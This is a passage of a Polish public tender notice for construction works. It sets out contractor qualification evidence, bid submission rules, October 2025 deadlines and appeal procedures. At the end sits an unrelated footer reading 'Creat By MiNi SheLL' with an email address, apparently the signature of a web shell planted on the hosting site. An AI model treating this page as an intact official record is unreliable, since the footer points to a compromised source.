(Dz. U. z 2019 r. poz. 831) lub odpowiadające im kwalifikacje nadane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów upoważniające do kierowania robotami budowlanymi w zakresie objętym przedmiotem zamówienia. W przypadku Wykonawców zagranicznych dopuszcza się również kwalifikacje zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy prawo budowlane,<br/> z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2023.334 ze zm.). <br/><br/>Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ; <br/>b)	Zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega <br/>z opłacaniem podatków, i opłat, w zakresie art. 109 ust.1 pkt.1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczenie zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnymi lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>c)	Zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy rolniczego ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust.1 pkt.1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przez upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności; <br/>d)	Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; załącznik nr 8 do SWZ<br/>2. Wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; załącznik nr 9 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Wykonawca może złożyć tylko jedną ofertę.<br/>2.	Ofertę, oświadczenia, o których mowa w art. 125 ust 1 Ustawy Pzp, składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, (art. 63 ust. 2 ustawy Pzp).<br/>3.	Do przygotowania oferty zaleca się wykorzystanie formularza ofertowego, którego wzór stanowi załącznik nr 1 do SWZ, a udostępnionego przez zamawiającego wraz z innymi dokumentami zamówienia na Platformie e-Zamówienia. W przypadku, gdy Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru w treści oferty winien zamieścić wszystkie informacje, które zawarte zostały we wzorze tego formularza.<br/>5.	Wraz z ofertą, Wykonawca zobowiązany jest złożyć dokumenty: <br/>a)	oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu, według wzoru sta-nowiącego załącznik nr 2 SWZ.<br/>b)	oświadczenie podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu (jeżeli dotyczy) - według wzoru stanowiącego załącznik nr 3 do SWZ; <br/>c)	Zobowiązanie podmiotu udostępniającego zasoby (jeżeli dotyczy) - według wzoru stanowiącego załącznik nr 4 <br/>d)	oświadczenie, z którego wynika, które roboty budowlane, usługi lub dostawy wykonają poszczególni Wykonawcy (w przypadku Wykonawców występujących wspólnie) - według wzoru stanowiącego załącznik nr 8 do SWZ; <br/>e)	pełnomocnictwo dla osoby/osób składających ofertę – w sytuacji, gdy ofertę podpisuje osoba, której prawo do re-prezentowania Wykonawcy nie wynika z dokumentów rejestrowych; Warunek ten dotyczy również odpowiednio osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oraz podwykonawców. Pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie do podpisania oferty. 8.	Jeżeli wraz z ofertą składane są dokumenty zawierające tajemnicę przedsiębiorstwa, w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (t.j.: Dz. U. z 2022 r. poz. 1233) Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”. Zarówno załącznik stanowiący dodać w polu „Załączniki i inne dokumenty przedstawione w ofercie przez Wykonawcę”.<br/>9.	Wykonawca zobowiązany jest, wraz z przekazaniem tych informacji, wykazać spełnienie przesłanek określonych w art. 11 ust. 2 ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji. Zaleca się, aby uzasadnienie zastrzeżenia informacji jako tajemnicy przedsiębiorstwa było sformułowane w sposób umożliwiający jego udostępnienie. Zastrzeżenie przez Wykonawcę tajemnicy przedsiębiorstwa bez uzasadnienia, będzie traktowane przez Zamawiającego jako bezskuteczne ze względu na zaniechanie przez Wykonawcę podjęcia niezbędnych działań w celu zachowania poufności objętych klauzulą informacji zgodnie z postanowieniami art. 18 ust. 3 pzp. <br/>10.	System sprawdza, czy złożone pliki są podpisane i automatycznie je szyfruje, jednocześnie<br/>informując o tym wykonawcę. Potwierdzenie czasu przekazania i odbioru oferty znajduje się w Elektronicznym Po-twierdzeniu Przesłania (EPP) i Elektronicznym Potwierdzeniu Odebrania (EPO).<br/>EPP i EPO dostępne są dla zalogowanego Wykonawcy w zakładce „Oferty/Wnioski”. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa <br/>w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zawiera rozdział XX. INFORMACJE O TREŚCI ZAWIERANEJ UMOWY ORAZ MOŻLIWOŚCI JEJ ZMIANY <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">a pośrednictwem Platformy e-Zamówienia w zakładce „Oferty/wnioski”, widocznej w podglądzie przedmiotowego postępowania po zalogowaniu się na konto Wykonawcy na Platformie.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-21 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Środki ochrony prawnej przysługują̨ Wykonawcy, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść́ szkodę̨ w wyniku naruszenia przez Zamawiającego przepisów Pzp.<br/>2.	Odwołanie przysługuje na:<br/>a)	niezgodną z przepisami ustawy czynność́ Zamawiającego, podjętą w postępowaniu o udzielenie zamówienia, w tym na projektowane postanowienie umowy;<br/>b)	zaniechanie czynności w postępowaniu o udzielenie zamówienia, do której Zamawiający był obowiązany na podstawie ustawy.<br/>3.	Odwołanie wnosi się̨ do Prezesa Krajowej Izby Odwoławczej w formie pisemnej albo w formie elektronicznej albo w postaci elektronicznej opatrzone podpisem zaufanym.<br/>4.	Na orzeczenie Krajowej Izby Odwoławczej oraz postanowienie Prezesa Krajowej Izby Odwoławczej, o którym mowa w art. 519 ust. 1 Pzp, stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do sądu. Skargę̨ wnosi się̨ do Sądu Okręgowego w Warszawie za pośrednictwem Prezesa Krajowej Izby Odwoławczej.<br/>5.	Szczegółowe informacje dotyczące środków ochrony prawnej określone są w Dziale IX „Środki ochrony prawnej” Pzp.

Creat By MiNi SheLL
Email: jattceo@gmail.com